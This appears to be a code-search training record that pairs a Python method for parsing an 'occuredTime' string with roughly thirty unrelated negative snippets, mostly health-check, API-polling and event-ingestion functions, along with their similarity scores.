self.tracer.error(
"[%s] Failed to get RH events and update the result for the resource with azResourceId=%s. numberOfEventsCompiledForAllResourcesSoFar=%s (%s)", self.fullName, resource[AZ_RESOURCE_ID], len(self.lastResult), e, exc_info=True)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _actionGetRHEvents(self):\n self.lastResult = []\n self.pollingState = self.state.get(POLLING_STATE, {})\n\n # Get resources for which AIOps is enabled.\n resources = self.__compileAIOpsEnabledResources()\n self.tracer.info(\"[%s] There are %s resources compiled for fetching RH events and they are %s\" % (\n self.fullName, len(resources), resources))\n\n # Get an iterator for the resources. Using iterator ensures that we loop over the resources list only once while submitting to the threadpoolexecutor.\n resourcesIterator = iter(resources)\n\n # Initialize a threadpoolexecutor to parallelize RH calls. Using with statement to ensure clean up of threadpoolexecutor object.\n with ThreadPoolExecutor(NUMBER_OF_RH_THREADS) as executor:\n # Schedule the first N calls. Not scheduling them all at once, to avoid consuming excessive amounts of memory.\n futures = {\n executor.submit(self.__getRHEventsAndUpdateResult, resource): resource\n for resource in itertools.islice(resourcesIterator, NUMBER_OF_RH_THREADS)\n }\n\n while futures:\n # Wait for a call to complete.\n completedFutures, futures = wait(\n futures, timeout=MAX_TIMEOUT, return_when=FIRST_COMPLETED\n )\n\n # Schedule the next set of calls based on the number of completed calls. There shouldn't be more than NUMBER_OF_RH_THREADS calls in the pool at a time, to keep memory consumption down.\n for resource in itertools.islice(resourcesIterator, len(completedFutures)):\n futures.add(\n executor.submit(\n self.__getRHEventsAndUpdateResult, resource)\n )\n\n self.tracer.info(\"[%s] The number of health events compiled = %s\" % (\n self.fullName, len(self.lastResult)))\n self.updateState()",
"def poll_health():\n global timesCalled\n\n # Poll /health\n session = requests.Session()\n retry = Retry(connect=3, backoff_factor=0.5)\n adapter = HTTPAdapter(max_retries=retry)\n session.mount('http://', adapter)\n response = session.get(health_url)\n\n # Check HTTP status code\n status_code = response.status_code\n if status_code != status_ok:\n exit(1)\n\n # Get metrics values\n metrics = response.json()['metrics']\n requestLatencyValues.append(metrics['requestLatency'])\n dbLatencyValues.append(metrics['dbLatency'])\n cacheLatencyValues.append(metrics['cacheLatency'])\n\n # If 60 seconds has passed, send data to STDOUT\n timesCalled += 1\n if timesCalled == 6:\n output_data()\n\n timesCalled = 0\n requestLatencyValues.clear()\n dbLatencyValues.clear()\n cacheLatencyValues.clear()",
"def _fetch(\n cls, url: str, headers: Mapping[str, str], params: Mapping[str, Any]\n ) -> Tuple[List[EventType], Optional[str]]:\n status_url = cls._post_query(url, headers, params)\n # Await a while before polling the results\n time.sleep(0.1)\n result_url = cls._poll_status(status_url, headers, params)\n data, headers = cls._get_results(result_url, headers, params)\n result = json.loads(data)\n return result, headers.get(\"x-next-token\")",
"def on_get(self, req, resp):\n hc = HealthCheckCombined(state_manager=self.state_manager,\n orchestrator=self.orchestrator,\n extended=True)\n return hc.get(req, resp)",
"def on_get(self, req, resp):\n hc = HealthCheckCombined(state_manager=self.state_manager,\n orchestrator=self.orchestrator,\n extended=False)\n return hc.get(req, resp)",
"def refresh(self):\n self._data = self._retrieve_health_data()\n return self",
"async def health(self):\n\n request = telemetry_pb2.SubscribeHealthRequest()\n health_stream = self._stub.SubscribeHealth(request)\n\n try:\n async for response in health_stream:\n \n\n \n yield Health.translate_from_rpc(response.health)\n finally:\n health_stream.cancel()",
"def _get_heals(code, start=0, end=None, names=None, for_player=None):\n\n if end is None:\n end = start + 3 * 60 * 60 * 1000 # look at up to 3h of data\n\n if names is None:\n names = dict()\n\n heals = []\n periodics = []\n absorbs = []\n\n next_start = start\n\n print(\"Fetching data from WCL...\")\n progress_bar = ProgressBar(end - start, length=70)\n\n # will have to loop to get results\n request_more = True\n while request_more:\n url = f\"{API_ROOT}/report/events/healing/{code}?start={next_start}&end={end}&api_key={API_KEY}\"\n\n print(progress_bar.render(next_start - start), end=\"\\r\")\n\n data = _get_api_request(url)\n events = data[\"events\"]\n if \"nextPageTimestamp\" in data:\n next_start = data[\"nextPageTimestamp\"]\n else:\n request_more = False\n\n for e in events:\n try:\n timestamp = e[\"timestamp\"]\n timestamp = datetime.fromtimestamp(timestamp / 1000.0).time()\n spell_id = str(e[\"ability\"][\"guid\"])\n\n if \"sourceID\" not in e:\n # heal not from a player, skipping\n continue\n\n source = e[\"sourceID\"]\n source = names.get(source, f\"[pid {source}]\")\n\n if for_player and source != for_player:\n continue\n\n target = e[\"targetID\"]\n target = names.get(target, f\"[pid {source}]\")\n # event_type = e[\"type\"]\n\n amount = e[\"amount\"]\n\n if e[\"type\"] == \"absorbed\":\n # Shield absorb\n absorbs.append((timestamp, source, spell_id, target, amount, 0, False))\n continue\n\n overheal = e.get(\"overheal\", 0)\n\n if e.get(\"tick\"):\n # Periodic tick\n periodics.append(\n (timestamp, source, spell_id, target, amount + overheal, overheal, False)\n )\n continue\n\n is_crit = e.get(\"hitType\", 1) == 2\n\n heals.append(\n (\n timestamp,\n source,\n spell_id,\n target,\n amount + overheal,\n overheal,\n is_crit,\n )\n )\n except Exception as ex:\n print(\"Exception while handling line\", e)\n print(ex)\n\n print(progress_bar.render(end - start))\n\n return heals, periodics, absorbs",
"def get_healthcheck() -> Response:\n\n try:\n with get_cursor(db_creds, commit=False) as cur:\n cur.execute(\"SELECT * FROM events.healthchecks\")\n data = cur.fetchall()\n return jsonify(status_code=200, data=data)\n except psycopg2.Error as e:\n return jsonify(\n message=f\"Psycopg2 driver error: {type(e)}\",\n args=e.args,\n status_code=500,\n error_type=\"Internal Server Error\",\n )\n except Exception as e:\n return jsonify(\n message=f\"Internal Server Error: {type(e)}\",\n args=e.args,\n status_code=500,\n error_type=\"Internal Server Error\",\n )",
"def fetch(self):\n\n\n # Update Prometheus metrics with application metrics\n self.current_requests.set(get_current_requests())\n self.total_uptime.set(get_uptime())\n self.health.state(get_health())",
"def process_resp(self, msg, operation, status, index):\n metric = \"%s.%d.%s\" % (METRIC_NAME, index, operation)\n self.results.append(Event(TIMESTAMP_MILLIS(), \"opentsdb\", metric, msg, status))\n if status == \"0\":\n self.cause.extend(msg)\n metric = \"%s.%d.%s\" % (METRIC_NAME, index, \"health\")\n analyse_status = MonitorStatus[\"red\"]\n self.results.append(Event(TIMESTAMP_MILLIS(), \"opentsdb\", metric, msg, analyse_status))",
"def test_health_get(self):\n pass",
"def fetch_incidents(client: Client, last_run: dict, params: Dict, is_test=False) -> Tuple[dict, list]:\n fetch_type = params.get(\"fetch_type\", DEFAULT_FETCH_TYPE)\n if not fetch_type:\n fetch_type = DEFAULT_FETCH_TYPE\n params = validate_fetch_incidents_parameters(params)\n\n if fetch_type == DEFAULT_FETCH_TYPE:\n query = prepare_query_for_fetch_alerts(last_run, params)\n else:\n query = prepare_query_for_fetch_events(last_run, params)\n\n demisto.info(f'[SolarWinds]: Query: {query}')\n\n results = client.http_request(\"POST\", URL_SUFFIX[\"QUERY\"], json_data={\n \"query\": query\n }).get(\"results\")\n\n next_run = last_run\n incidents = []\n for result in results:\n occurred = result['TriggeredDateTime'] if fetch_type == \"Alert\" else result['EventTime']\n incidents.append({\n 'name': result['Name'],\n 'occurred': arg_to_datetime(occurred).strftime(DATE_FORMAT), # type: ignore\n 'rawJSON': json.dumps(result)\n })\n\n if results:\n if fetch_type == DEFAULT_FETCH_TYPE:\n next_run['alert_active_id'] = results[-1]['AlertActiveID']\n else:\n next_run['event_id'] = results[-1]['EventID']\n\n if is_test:\n return {}, []\n\n return next_run, incidents",
"def test_get_hyperflex_health_list(self):\n pass",
"def fetch_cq_status():\n\n fetch_status = FetchStatus.query().get()\n cursor = ''\n begin = ''\n end = ''\n retry_count = 0\n\n while True:\n if fetch_status:\n if fetch_status.done:\n logging.info('historical fetching done so fetch latest...')\n end = str(time_functions.timestamp.utcnow_ts())\n\n last_build_run_seen = BuildRun.query().order(\n -BuildRun.time_finished).fetch(1)\n begin = str(time_functions.timestamp.utctimestamp(\n last_build_run_seen[0].time_finished))\n cursor = ''\n else:\n begin = fetch_status.begin\n end = fetch_status.end\n cursor = fetch_status.cursor\n else:\n logging.info('didnt find any historical information. fetching last week')\n begin = str(time_functions.timestamp.utctimestamp(\n datetime.datetime.utcnow() - datetime.timedelta(weeks=1)))\n end = str(time_functions.timestamp.utcnow_ts())\n\n if begin and end:\n logging.info(\n 'fetching from %s to %s cursor: %s',\n str(datetime.datetime.utcfromtimestamp(float(begin))),\n str(datetime.datetime.utcfromtimestamp(float(end))),\n cursor)\n else:\n logging.info('fetching with no begin/end and cursor: ' + cursor)\n\n url = \"https://chromium-cq-status.appspot.com/query\"\n params = []\n params.append('tags=action=verifier_jobs_update')\n if cursor:\n params.append('cursor=' + cursor)\n if begin:\n params.append('begin=' + begin)\n if end:\n params.append('end=' + end)\n # Tried count of 200 or more but would get OOM or deadline errors. Even 50\n # sometimes gives:\n # \"Values may not be more than 1000000 bytes in length; received 2118015\n # bytes\"\n params.append('count=10')\n\n url += '?' + '&'.join(params)\n logging.info('fetching url: ' + url)\n\n try:\n urlfetch.set_default_fetch_deadline(60)\n result = urlfetch.fetch(url).content\n\n timestamp_str = '\"timestamp\":\"'\n logging_idx = result.find(timestamp_str)\n if logging_idx != -1:\n logging_idx += len(timestamp_str)\n logging_idx2 = result.find('\"', logging_idx)\n logging.info(' current fetch has time of ' +\n result[logging_idx:logging_idx2])\n\n try:\n json_result = json.loads(result)\n\n more = json_result['more']\n cursor = json_result['cursor']\n\n try:\n logging_output = parse_cq_data(json_result)\n if logging_output:\n logging.info('found flakes: ' + ' '.join(logging_output))\n except DeadlineExceededError:\n logging.info('got DeadlineExceededError during parse_cq_data, '\n 'catching to not show up as error')\n return\n except ValueError:\n requests_metric.increment_by(1, fields={'status': 'parse_error'})\n logging.exception('failed to parse CQ data from %s', url)\n if 'DeadlineExceededError' in result:\n logging.error('got deadline exceeded, trying again after 1s')\n time.sleep(1)\n continue\n elif retry_count < 3:\n retry_count += 1\n logging.error('will retry after sleeping ' + str(retry_count))\n time.sleep(retry_count)\n continue\n else:\n logging.error('giving up and will count current fetch as done')\n # Don't want to continue this as could be a bad cursor.\n more = False\n else:\n requests_metric.increment_by(1, fields={'status': 'success'})\n\n if not fetch_status:\n fetch_status = FetchStatus()\n fetch_status.done = not more\n if fetch_status.done:\n fetch_status.cursor = ''\n fetch_status.begin = ''\n fetch_status.end = ''\n retry_count = 0\n logging.info('finished fetching for current cursor')\n else:\n fetch_status.begin = begin\n fetch_status.end = end\n fetch_status.cursor = cursor\n fetch_status.put()\n\n if not more:\n return # finish the cron job and wait for next iteration\n except urllib2.URLError, e:\n 
requests_metric.increment_by(1, fields={'status': 'fetch_error'})\n logging.warning('Failed to fetch CQ status: %s', e.reason)",
"def get_health(self):\n return {\n 'api_name': 'BrightHive Master Client Index API',\n 'current_time': str(datetime.utcnow()),\n 'current_api_version': '1.0.0',\n 'api_status': 'OK'\n }, 200",
"def get_health_data_and_ingest_into_sentinel(self):\n self.pull_and_push_the_snapshot_data(\n HEALTH_ENDPOINT, self.health_table_name, fields=MODIFIED_FIELDS\n )",
"async def _async_status_request(self) -> None:\n try:\n # status_response = await self._hass.async_add_executor_job(\n # self._mc_status.status, self._MAX_RETRIES_STATUS\n # )\n if self.access_token:\n if (time.time() - self.last_request) > 1800:\n phantom = await self._hass.async_add_executor_job(\n self._phantom_load\n )\n if phantom.status_code == HTTP_OK:\n self.phantom_load = round(phantom.json().get(\"power\") / 1000, 3)\n else:\n _LOGGER.warning(phantom.content)\n\n # Got answer to request, update properties.\n live = await self._hass.async_add_executor_job(self._live_data)\n\n if live.status_code == HTTP_OK:\n self.power_usage = round(abs(live.json().get(\"power\")) / 1000, 3)\n else:\n _LOGGER.warning(live.content)\n\n self.last_request = time.time()\n self._last_status_request_failed = False\n except OSError as error:\n # No answer to request, set all properties to unknown.\n self.power_usage = None\n self.phantom_load = None\n\n # Inform user once about failed update if necessary.\n if not self._last_status_request_failed:\n _LOGGER.warning(\n \"Updating the properties of '%s' failed - OSError: %s\",\n self.unique_id,\n error,\n )\n self._last_status_request_failed = True",
"def get_host_stats(self, refresh=False):",
"def __process_health(self) -> None:\n status = self.metrics.get(\"Status\", None)\n if status:\n health = status.get(\"Health\", None)\n measurement = \"Health\"\n if health == \"Warning\":\n value = 1\n datapoint = self.__gen_datapoint(measurement, self.label, value)\n self.datapoints.append(datapoint)\n elif health == \"Critical\":\n value = 2\n datapoint = self.__gen_datapoint(measurement, self.label, value)\n self.datapoints.append(datapoint)\n return",
"async def async_update(self):\n today = date.today()\n\n try:\n self.data = await self.hass.async_add_executor_job(\n self.client.get_stats_and_body, today.isoformat()\n )\n except (\n GarminConnectAuthenticationError,\n GarminConnectTooManyRequestsError,\n GarminConnectConnectionError,\n ) as err:\n _LOGGER.error(\n \"Error occurred during Garmin Connect get activity request: %s\", err\n )\n return\n except Exception: # pylint: disable=broad-except\n _LOGGER.exception(\n \"Unknown error occurred during Garmin Connect get activity request\"\n )\n return",
"def pull_and_push_the_snapshot_data(\n self,\n endpoint,\n table_name,\n hashed_events_list=list(),\n hash_field_list=[],\n fields=None,\n ):\n __method_name = inspect.currentframe().f_code.co_name\n posted_event_count = 0\n res = self.pull(url=self.base_url + endpoint)\n if res and len(res):\n if endpoint == consts.HEALTH_ENDPOINT:\n link_status_dict, aggregated_peak_traffic_dict = {}, {}\n connectivity_dict, trafficdrop_dict = {}, {}\n\n # for link_status\n for k, v in (\n res.get(\"network\", {})\n .get(\"interfaces\", {})\n .get(\"sensors\", {})\n .items()\n ):\n link_status = \"UP\"\n for x, y in v.items():\n if y.get(\"link\", \"\") != \"UP\":\n link_status = \"Degraded\"\n break\n link_status_dict[k] = link_status\n\n # for aggregated_peak_traffic\n for key, value in (\n res.get(\"network\", {}).get(\"traffic\", {}).get(\"sensors\", {}).items()\n ):\n aggregated_peak_traffic_dict[key] = value.get(\n \"aggregated_peak_traffic_mbps\", \"\"\n )\n\n # for connectivity status and error\n for item in res.get(\"connectivity\", {}).get(\"sensors\", {}):\n connectivity_dict[item.get(\"name\", \"\")] = {\n \"status\": item.get(\"status\", \"\"),\n \"error\": item.get(\"error\", \"\"),\n }\n\n # for traffic_drop status and error\n for item in res.get(\"trafficdrop\", {}).get(\"sensors\", {}):\n trafficdrop_dict[item.get(\"name\", \"\")] = {\n \"status\": item.get(\"status\", \"\"),\n \"error\": item.get(\"error\", \"\"),\n }\n\n for i in range(len(res.get(\"sensors\", {}))):\n # adding d_link_status\n res[\"sensors\"][i][\"d_link_status\"] = link_status_dict.get(\n res.get(\"sensors\", {})[i].get(\"luid\", \"\"), \"\"\n )\n # adding d_aggregated_peak_traffic\n res[\"sensors\"][i][\n \"d_aggregated_peak_traffic\"\n ] = aggregated_peak_traffic_dict.get(\n res.get(\"sensors\", {})[i].get(\"name\", \"\"), \"\"\n )\n # adding d_connectivity_status\n res[\"sensors\"][i][\"d_connectivity_status\"] = connectivity_dict.get(\n res.get(\"sensors\", {})[i].get(\"name\", \"\"), {}\n ).get(\"status\", \"\")\n # adding d_connectivity_error\n res[\"sensors\"][i][\"d_connectivity_error\"] = connectivity_dict.get(\n res.get(\"sensors\", {})[i].get(\"name\", \"\"), {}\n ).get(\"error\", \"\")\n # adding d_trafficdrop_status\n res[\"sensors\"][i][\"d_trafficdrop_status\"] = trafficdrop_dict.get(\n res.get(\"sensors\", {})[i].get(\"name\", \"\"), {}\n ).get(\"status\", \"\")\n # adding d_trafficdrop_error\n res[\"sensors\"][i][\"d_trafficdrop_error\"] = trafficdrop_dict.get(\n res.get(\"sensors\", {})[i].get(\"name\", \"\"), {}\n ).get(\"error\", \"\")\n\n list_res = [res]\n self.post_data_to_sentinel(list_res, table_name, fields)\n posted_event_count += 1\n else:\n for event in res:\n temp_dict = {}\n for field in hash_field_list:\n temp_dict[field] = event.get(field)\n hash_of_event = self.get_results_hash(temp_dict)\n if hash_of_event not in hashed_events_list:\n self.post_data_to_sentinel(event, table_name, fields)\n posted_event_count += 1\n hashed_events_list.append(hash_of_event)\n self.save_checkpoint_snapshot(hashed_events_list)\n\n self.applogger.info(\n \"{}(method={}) : {} : Posted total {} event(s) into MS Sentinel. No more events.\"\n \" Stopping the collection.\".format(\n consts.LOGS_STARTS_WITH,\n __method_name,\n self.function_name,\n posted_event_count,\n )\n )",
"def collect_events(helper, ew):\n\n opt_start_time_start = helper.get_arg('start_time_start')\n opt_endpoints = helper.get_arg('endpoints')\n opt_interval = int(helper.get_arg('interval'))\n opt_live = False\n\n proxy = helper.get_proxy()\n if proxy:\n proxy_auth = \"{}:{}\".format(\n proxy['proxy_username'], proxy['proxy_password'])\n proxies = {\n \"https\": \"{protocol}://{auth}@{host}:{port}/\".format(protocol=proxy['proxy_type'], auth=proxy, host=proxy['proxy_url'], port=proxy['proxy_port']),\n \"http\": \"{protocol}://{auth}@{host}:{port}/\".format(protocol=proxy['proxy_type'], auth=proxy, host=proxy['proxy_url'], port=proxy['proxy_port'])\n }\n else:\n proxies = None\n\n helper.log_debug(\n \"[-] webex password_type: {}\".format(helper.get_global_setting(\"password_type\")))\n\n params = {\"opt_username\": helper.get_global_setting(\"username\"),\n \"opt_password\": helper.get_global_setting(\"password\"),\n \"opt_site_name\": helper.get_global_setting(\"site_name\"),\n \"limit\": 500,\n \"timezone\": \"20\",\n # \"password_type\": authentication_type[\"Password Authentication\"],\n # \"password_type\": authentication_type[\"OAuth\"],\n \"password_type\": authentication_type[helper.get_global_setting(\"password_type\")],\n \"client_id\": helper.get_global_setting(\"client_id\"),\n \"client_secret\": helper.get_global_setting(\"client_secret\"),\n \"refresh_token\": helper.get_global_setting(\"refresh_token\"),\n \"proxies\": proxies}\n\n # Historical Data\n helper.log_debug(\"Historical Data\")\n for opt_endpoint in opt_endpoints:\n helper.log_debug(\"[-] \\t At {}\".format(opt_endpoint))\n\n # endtime is midnight of GMT - 3days\n enddt = datetime.utcnow().date() - timedelta(3)\n end_time = datetime.combine(\n enddt, datetime.max.time()).strftime('%m/%d/%Y %H:%M:%S')\n\n # create checkpoint key for offest and timestamp\n timestamp_key = \"timestamp_{}_{}_processing\".format(\n helper.get_input_stanza_names(), opt_endpoint)\n\n start_time = helper.get_check_point(timestamp_key)\n if start_time is None:\n # if it's the 1st time, get the start_time from UI, and then save it in checkpoint\n start_time = opt_start_time_start\n helper.save_check_point(timestamp_key, start_time)\n else:\n # shift the start_time by 1 second\n start_time = (datetime.strptime(start_time, '%m/%d/%Y %H:%M:%S') +\n timedelta(seconds=1)).strftime('%m/%d/%Y %H:%M:%S')\n\n helper.log_debug(\"Start time: {}\".format(start_time))\n helper.log_debug(\"End time: {}\".format(end_time))\n\n # Update Parameters\n params.update({\"mode\": \"historical\"})\n params.update({\"opt_endpoint\": opt_endpoint})\n params.update({\"start_time\": start_time})\n params.update({\"end_time\": end_time})\n params.update({\"timestamp_key\": timestamp_key})\n\n records = params['limit']\n offset = 1\n while (records == params['limit']):\n helper.log_debug(\"current_offset: {}\".format(offset))\n params['offset'] = offset\n records = fetch_webex_logs(ew, helper, params)\n helper.log_debug(\"\\t Offet:{}\\tLimit: {}\\tRecords Returned: {}\".format(\n offset, params['limit'], records))\n if records:\n offset += records",
"async def fetch_data(self):\n url = URL_HASSIO_VERSION.format(self.upstream)\n try:\n _LOGGER.info(\"Fetch update data from %s\", url)\n with async_timeout.timeout(10, loop=self.loop):\n async with self.websession.get(url) as request:\n data = await request.json(content_type=None)\n\n except (aiohttp.ClientError, asyncio.TimeoutError, KeyError) as err:\n _LOGGER.warning(\"Can't fetch versions from %s -> %s\", url, err)\n return\n\n except json.JSONDecodeError as err:\n _LOGGER.warning(\"Can't parse versions from %s -> %s\", url, err)\n return\n\n # data valid?\n if not data:\n _LOGGER.warning(\"Invalid data from %s\", url)\n return\n\n # update versions\n self._data[ATTR_HOMEASSISTANT] = data.get('homeassistant')\n self._data[ATTR_HASSIO] = data.get('hassio')\n self.save()",
"def _fetch(self):\n self._data = self._get(self.url)\n\n if self._data['released_errata'] is not None:\n self._released_errata = Erratum(errata_id=self._data[\n 'released_errata']['id'])\n\n for errata_dict in self._data['all_errata']:\n errata = Erratum(errata_id=errata_dict['id'])\n self._all_errata.append(errata)\n\n self._signed_rpms = self._data.get('rpms_signed')\n\n for et_file in self._data['files']:\n self._files.append(et_file['path'])",
"async def send_event_host_updates_final(self):\n async with self.pg.acquire() as conn:\n # get events for which updates need to be sent\n events = await conn.fetch(\n \"\"\"\n SELECT\n e.id, e.name, e.host AS host_user_id,\n event_link(cat.slug, e.slug, e.public, $1) AS event_link,\n cat.name AS cat_name, cat.slug AS cat_slug,\n cat.company AS company_id\n FROM events AS e\n JOIN categories AS cat ON e.category = cat.id\n WHERE e.status = 'published' AND\n e.start_ts BETWEEN now() + '4 hours'::interval AND now() + '5 hours'::interval\n ORDER BY cat.company\n \"\"\",\n self.settings.auth_key,\n )\n if not events:\n return 0\n\n user_emails = 0\n pool = await self.get_redis()\n cache_time = 24 * 3600\n booked_stmt = await conn.prepare(\"SELECT count(*) FROM tickets WHERE status='booked' AND event=$1\")\n with await pool as redis:\n for company_id, g in groupby(events, itemgetter('company_id')):\n user_ctxs = []\n for e in g:\n key = 'event-host-final-update:{}'.format(e['id'])\n if await redis.get(key):\n continue\n await redis.setex(key, cache_time, 1)\n # better to do this as a single query here when required than call it every time\n tickets_booked = await booked_stmt.fetchval(e['id'])\n ctx = {\n 'event_link': e['event_link'],\n 'event_dashboard_link': f'/dashboard/events/{e[\"id\"]}/',\n 'event_name': e['name'],\n 'tickets_booked': tickets_booked or 0,\n 'category_name': e['cat_name'],\n is_cat(e['cat_slug']): True,\n }\n user_ctxs.append(UserEmail(id=e['host_user_id'], ctx=ctx))\n\n if user_ctxs:\n user_emails += len(user_ctxs)\n await self.send_emails.direct(company_id, Triggers.event_host_final_update.value, user_ctxs)\n return user_emails",
"async def health(self) -> Health:\n response = await self._http_requests.get(build_url(Paths.HEALTH))\n return Health(**response.json())",
"def StreamHealth(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)",
"def get_hostname_from_sha(query_params=\"\",\n host=env.AMP.get(\"host\"),\n client_id=env.AMP_CLIENT_ID,\n api_key=env.AMP_API_KEY,\n):\n print(\"\\n==> Getting events from AMP\")\n i_got_it=0\n if i_got_it==0:\n print(cyan(env.get_line(),bold=True))\n print (yellow(\"Second : Call the correct AMP API with the correct syntax...The API call which gives you the list of all infected endpoints \"))\n print()\n print (yellow(\"Hint :\"))\n print (yellow(\"https://api-docs.amp.cisco.com/api_actions/details?api_action=GET+%2Fv1%2Fevents&api_host=api.eu.amp.cisco.com&api_resource=Event&api_version=v1\"))\n print()\n print (yellow(\"Change the value of i_got_it to 1 in order to move forward\"))\n sys.exit() \n #url = f\"https://{client_id}:{api_key}@{host}/v1/events\"\n response = requests.get(url, params=query_params, verify=False)\n if debug:\n print(cyan(env.get_line(),bold=True))\n print(cyan(response.json())) \n # Consider any status other than 2xx an error\n response.raise_for_status()\n events_list = response.json()\n if debug: \n events_list = response.json()\n print(green((events_list)))\n for events in events_list:\n #hostname=event['computer']['hostname'] \n print(red(events))\n '''\n hostname=response.json()['data'][0]['computer']['hostname']\n return hostname \n '''\n events_list = response.json()['data']\n return events_list",
"async def run(self):\n current_status = \"Init\"\n while self.expected_status != current_status:\n await asyncio.sleep(1)\n async with aiohttp.ClientSession() as session:\n async with session.get(self.url) as response:\n api_call_result = await response.json()\n current_status = api_call_result[\"status\"]\n \n # Send our single event and then we're done\n yield TriggerEvent(api_call_result)"
] |
[
"0.74835974",
"0.60943276",
"0.607677",
"0.60051495",
"0.5991445",
"0.5785507",
"0.56111306",
"0.5549164",
"0.55123454",
"0.5506759",
"0.5465697",
"0.5452234",
"0.5400395",
"0.53932124",
"0.53769994",
"0.53689444",
"0.53555197",
"0.5351841",
"0.5351213",
"0.53326714",
"0.5322342",
"0.53220314",
"0.529372",
"0.5274521",
"0.5242314",
"0.52291757",
"0.5227746",
"0.5222065",
"0.51835304",
"0.5168513"
] |
0.7312966
|
1
|
Parse occuredTime string based on its format.
|
def __parseOccuredTime(self, occuredTime: str) -> datetime:
# Guard clause.
if not occuredTime:
raise ValueError(
'occuredTime cannot be null or empty.')
# There are two possible time formats observed for occuredTime, which are stored in OCCURED_TIME_FORMAT.
for dateFormat in OCCURED_TIME_FORMAT:
try:
occuredTimeParsed = datetime.strptime(occuredTime, dateFormat)
except ValueError as e:
self.tracer.warning(
"[%s] occuredTime is not of the format %s. (%s)" % (self.fullName, dateFormat, e), exc_info=True)
else:
self.tracer.info(
"[%s] occuredTime is of the format %s" % (
self.fullName, dateFormat))
return occuredTimeParsed
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _parse_time_str(self, time_str):\n time_fmt = \"%I:%M%p\"\n time_str = re.sub(\n r\":+\",\n \":\",\n re.sub(r\"\\s+\", \"\", re.sub(r\"to|from|\\.\", \"\", time_str.lower())).replace(\n \"o\", \"0\"\n ),\n )\n if \":\" not in time_str:\n time_fmt = \"%I%p\"\n elif len(time_str) < 6:\n time_fmt = \"%I%p\"\n time_str = time_str.replace(\":\", \"\")\n return datetime.strptime(time_str, time_fmt).time()",
"def parse_strtime(timestr, fmt=PERFECT_TIME_FORMAT):\r\n return datetime.datetime.strptime(timestr, fmt)",
"def parse_strtime(timestr, fmt=PERFECT_TIME_FORMAT):\n return datetime.datetime.strptime(timestr, fmt)",
"def parse(str):\n if len(str) != 16:\n raise ValueError(\"Invalid time length %d\" % len(str))\n if (str[-1]) == 'R':\n return parse_relative_time(str)\n return parse_absolute_time(str)",
"def parse_time(time_string):\n return calendar.timegm(time.strptime(time_string, \"%Y%m%dT%H%M%SZ\"))",
"def _change_time_format(time_string):\n datetime_object = parser.isoparse(time_string)\n return datetime_object",
"def __parse_time(self, time_obj):\n if time_obj:\n resp = ''\n if isinstance(time_obj, int) or isinstance(time_obj, str):\n resp = time_obj\n elif isinstance(time_obj, datetime.datetime):\n resp = calendar.timegm(time_obj.timetuple())\n else:\n raise Exception(\"Unknown __parse_time format for {0}\".format(time_obj))\n return str(resp)\n return None",
"def parse_time(s: str):\n return utils.parsers.parse_eng_unit(s, base_unit='s', default=1e-12)",
"def parseTime(string):\t\n \n if string == \"\":\n result = None\n if 'T' in string:\n string = string.replace('T', ' ')\n if 'Z' in string:\n string = string.replace('Z', '') \n\n if len(string) < 19:\n # string has some single digits\n p = \"\"\"^([0-9]{4})-([0-9]{1,2})-([0-9]{1,2}) \n ([0-9]{1,2}):([0-9]{1,2}):([0-9]{1,2}).*$\"\"\"\n s = re.findall(p, string)\n if len(s) > 0:\n string = '{0}-{1:02d}-{2:02d} {3:02d}:{4:02d}:{5:02d}'\\\n .format(*[int(x) for x in s[0]])\n\n for date_format in DATE_FORMATS:\n try:\n result = datetime.datetime.strptime(string, date_format)\n except ValueError:\n pass\n\n return result",
"def parse_time(text):\n\n # When keyword is 'in' adds values to time\n if text[-3] == 'in':\n remind_time = time.gmtime(int(text[-2]) * int(text[-1]) + time.time())\n # Otherwise try to parse time as written\n else:\n remind_time = text[-1].replace(':', ' ') \\\n + \" \" \\\n + time.strftime(\"%m/%d/%y\", time.gmtime(time.time()))\n remind_time = time.strptime(remind_time, \"%H %M %m/%d/%y\")\n return remind_time",
"def parse_time(self, gc):\n\n def match(time_str):\n if time_str == \"Half\":\n time = 0\n minute = -3\n status = 'd'\n elif time_str == \"ET\":\n time = 0\n minute = -1\n status = 'd'\n elif time_str == \"Final\":\n time = 0\n minute = 90\n status = 'f'\n elif re.match(\".*[\\d]{2}:[\\d]{2} UK\", time_str):\n time = re.search(\".*([\\d]{2}):([\\d]{2}) UK\", time_str).groups()\n time = datetime.time(int(time[0]), int(time[1]))\n minute = 0\n status = 'o'\n elif re.match(\".*[\\d]{1,3}\\'\", time_str):\n time = 0\n minute = re.search(\"([\\d]{1,3})\\'\", time_str).groups()[0]\n status = 'd'\n elif re.match(\".*[\\d]{1,3} min\", time_str):\n time = 0\n minute = re.search(\"([\\d]{1,3}) min\", time_str).groups()[0]\n status = 'd'\n elif time_str == \"1st\":\n time = 0\n minute = -4\n status = 'd'\n elif time_str == \"2nd\":\n time = 0\n minute = -2\n status = 'd'\n else:\n time = 0\n minute = 0\n status = 'c'\n\n return time, minute, status\n\n # (o)pen / (s)tarted / (f)inished\n try:\n t = gc.find(name='div', attrs={'class': 'teamTop_inGame'}).contents\n if type(t) == type([]) and len(t) > 0:\n return match(str(t[0]).strip())\n else:\n pass\n except AttributeError:\n pass\n\n try:\n t = gc.find(name='div', attrs={'class': 'teamTop'}).a.contents\n if type(t) == type([]):\n return match(str(t[0]).strip())\n else:\n pass\n\n except AttributeError:\n pass\n\n try:\n t = gc.find(name='div', attrs={'class': 'teamTop'}).contents\n if type(t) == type([]):\n if str(t[0]).strip() == \"Postp.\": # match postponed\n return 0, 0, 'p'\n else: # match cancelled or sth ;)\n return 0, 0, 'c'\n else:\n pass\n\n except AttributeError:\n pass\n\n return False, False, False",
"def parse_time(s):\n return time.gmtime(float(s))",
"def _parse_time(time_string: str) -> datetime:\n\n # Strings with timezone (+01:00) in v2 are not easily parsed. But time\n # zones are not important here, so we just omit them.\n time_string = time_string.rsplit('+')[0]\n\n time_formats = [\n '%Y-%m-%dT%H:%M:%S.%fZ', # Default\n '%Y-%m-%dT%H:%M:%SZ', # Imported UNCCD data\n '%Y-%m-%dT%H:%M:%S.%f', # Stripped timezone format (v2)\n ]\n for t_format in time_formats:\n try:\n return datetime.strptime(time_string, t_format)\n except ValueError:\n continue",
